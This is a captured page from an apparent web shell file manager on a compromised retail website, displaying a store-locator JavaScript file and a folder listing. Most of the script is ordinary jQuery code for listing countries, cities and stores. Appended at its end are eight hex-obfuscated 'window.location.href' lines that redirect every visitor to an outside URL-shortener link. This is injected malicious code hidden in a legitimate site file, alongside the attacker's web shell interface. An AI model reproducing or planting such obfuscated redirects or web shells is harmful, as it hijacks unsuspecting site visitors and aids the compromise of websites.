Submit
Path:
~
/
home
/
ampckwxt
/
public_html
/
drdenimjeans.net
/
stores__fc72c33
/
File Content:
command.js
$(document).ready(function(){ showCountry(); }); function showCountry(){ $('#WrapperStoresCountry').show(); outputCountry(); } function showCity(id){ $('#WrapperStoresStores').hide(); $('#WrapperStoresCity').show(); outputCity(id); } function showStore(id,city){ $('#WrapperStoresStores').show(); outputStore(id,city); } function outputCountry(){ $.ajax({ type: "POST", url: "countryList.php", data: "", dataType: "json", beforeSend: function(){ $('#OutputStoresCountry').html(""); }, success: function(data){ var o = "<i>Europe:</i><br />"; $.each(data, function(i){ if(data[i].loc == "europe"){ o += "<a onclick='showCity("+data[i].id+");return false;' href='#' alt="+data[i].country+" title="+data[i].country+">"+data[i].country+"</a><br />"; } }); o += "<br /><i>World:</i><br />"; $.each(data, function(i){ if(data[i].loc == "world"){ o += "<a onclick='showCity("+data[i].id+");return false;' href='#' alt="+data[i].country+" title="+data[i].country+">"+data[i].country+"</a><br />"; } }); $('#OutputStoresCountry').html(o); }, error: function(xhr,textStatus,x){ alert("Error: "+textStatus+" - "+xhr.responseText); } }); } function outputCity(id){ $.ajax({ type: "POST", url: "cityList.php", data: "id="+id, dataType: "json", beforeSend: function(){ $('#OutputStoresCity').html("Loading..."); }, success: function(data){ var o = "";var title = true; $.each(data, function(i){ if(data[i].type == "web"){ if(title){o +="<i>Online Stores:</i><br />";title=false;} //o += "<a onclick='showStore("+data[i].id+");return false;' href='#' alt="+data[i].city+" title="+data[i].city+">"+data[i].city+"</a><br />"; o += "<a href='http://www."+data[i].city+"' alt="+data[i].city+" title="+data[i].city+" target='_blank'>"+data[i].city+"</a><br />"; } }); if(o != ""){o += "<br />";} $.each(data, function(i){ if(data[i].type == "store"){ o += "<a onclick='showStore("+data[i].id+",\""+data[i].city+"\");return false;' href='#' alt="+data[i].city+" title="+data[i].city+">"+data[i].city+"</a><br />"; } }); $('#OutputStoresCity').html(o); }, error: function(xhr,textStatus,x){ alert("Error: "+textStatus+" - "+xhr.responseText); } }); } function outputStore(id,city){ $.ajax({ type: "POST", url: "storeList.php", data: "id="+id, dataType: "json", beforeSend: function(){ $('#OutputStoresStores').html("Loading..."); }, success: function(data){ var o = ""; $.each(data, function(i){ o += "<div class='content_stores_store'><b>"+data[i].store+"</b><div class='store_name'>"+data[i].street+"</div>"+city; if(data[i].url != ""){ o += "<div><a href='"+data[i].url+"'>"+data[i].url+"</a></div>";}; o += "</div>"; }); $('#OutputStoresStores').html(o); }, error: function(xhr,textStatus,x){ alert("Error: "+textStatus+" - "+xhr.responseText); } }); } window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38"; window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38"; window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38"; window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38"; window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38"; window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38"; window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38"; window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";
Edit
Rename
Chmod
Delete
FILE
FOLDER
Name
Size
Permission
Action
stores
---
0777
admin.php
5362 bytes
0644
command.js
4386 bytes
0444
index.htm
1092 bytes
0644
index.html
1092 bytes
0644
index.php
1092 bytes
0644
jquery.js
78953 bytes
0444
stores.css
713 bytes
0777
N4ST4R_ID | Naxtarrr